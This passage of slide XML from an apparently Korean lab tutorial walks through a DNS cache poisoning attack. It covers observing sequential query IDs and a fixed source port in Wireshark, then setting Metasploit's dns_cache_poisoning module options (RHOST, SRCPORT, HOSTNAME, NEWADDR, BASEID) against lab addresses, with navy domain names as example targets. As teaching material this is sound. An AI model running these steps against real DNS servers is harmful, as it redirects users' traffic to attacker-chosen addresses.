          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7900086" y="1338649"/>
            <a:ext cx="2403475" cy="928688"/>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197189632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D839C98-B0AF-4E88-B2F1-A98E8D9DF1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58638"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6967378" y="2412204"/>
            <a:ext cx="4362450" cy="2033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표 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8643CADF-ABB5-484B-9E24-87FFB6DEB086}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326482925"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6320247" y="4594322"/>
          <a:ext cx="5328158" cy="736600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5328158">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3611293521"/>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FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>주의</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>!</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465211"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437896">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="167640" marR="0" indent="-16764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오염시킬 호스트에 미리 접속하면</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin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실제 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>IP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>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서버에 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>캐싱되므로</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"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공격을 성공시킬 수 없음</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a: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375248"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="393405717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wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 캡처한 패킷들 중 로컬 네트워크의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(10.0.2.6)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 보낸 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의들</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(queries)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>www.navy.ac.kr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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>소스 포트는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>33333</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ www.navy.ac.kr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xb8a1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>는 바뀔 수 있음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a: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 name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE680142-7F58-42C6-9B8F-5CB4311B8A6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1488401453"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="536439" y="529780"/>
          <a:ext cx="5328158" cy="4394200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5328158">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="415428346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ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>참고</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4251996"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3989959">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="175260" marR="0" indent="-17526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칼리 리눅스의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 주소를 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>10.10.1.14(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>공격 대상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rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>로 설정하면 웹 브라우저를 통해서도 확인 가능</a:t>
                      </a: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276630"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9218" name="_x199974960">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{037F0F4E-FE9F-4E9A-9A9F-26FD27468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499" y="1426246"/>
            <a:ext cx="4062413" cy="1530350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9217" name="_x199978400">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D1A59FE-E102-42CE-BDF0-606AA9718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311" y="3107644"/>
            <a:ext cx="4062413" cy="16652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_x197188112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3C2799A-7CC5-4CAF-8175-B8D374BC7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886" y="1132703"/>
            <a:ext cx="5400675" cy="188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274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www.navy.mil.kr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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의의 소스 포트는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>33333</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ www.navy.mil.kr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>0xb8bf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    ➡ 로컬 네트워크 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버가 보내는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 순차적으로 증가</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    ➡ 로컬 네트워크 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>캐시 오염 공격에 취약함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캐시 오염 공격을 위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>캐시 오염 공격 모듈 사용</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt; use auxiliary/spoof/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"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197188352">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E07DB87-EE7B-43FC-8A39-69DD32363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859"/>
            <a:ext cx="5400675" cy="1895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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCDD0D74-68F9-436E-95DA-A938F7A60601}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2433329681"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="500180" y="3748510"/>
          <a:ext cx="5328158" cy="1224026"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5328158">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3599208759"/>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379462"/>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순차적으로 증가하는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1980~90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임</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="165100" marR="0" indent="-16510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1990~2000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BIND8</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섞어서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(shuffle)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사용하거나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풀을 사용하는 옵션만 제공</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주로 사용되고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BIND9</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 사용만 가능</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181591"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5B04E0F-AB60-49B8-AD10-9ED6EDF20664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6326415" y="768651"/>
            <a:ext cx="5321990" cy="2565258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76372707-B768-45DA-B4F0-1A727B8B4B58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6326415" y="4196565"/>
            <a:ext cx="3923308" cy="4162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30588627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공격 모듈의 옵션 확인</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show options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공격 대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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RHOST 10.10.1.14</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서버의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소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SRCPORT 33333</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서버가 상위 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의를 보낼 때 사용하는 포트 번호</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오염 대상 호스트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HOSTNAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>호스트명</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>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NEWADDR 10.10.1.99</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>위에서 설정한 호스트의 가짜 주소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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가짜 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>응답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BASEID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>질의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>주의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: BASEID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 통해 획득한 마지막 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 사용하면 되며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이 때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>진수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>진수로 변환하여 입력해야 함</a:t>
            </a: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ko-KR" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77E8097B-8C3D-442B-8ED1-2581D6C7C4B9}"/>
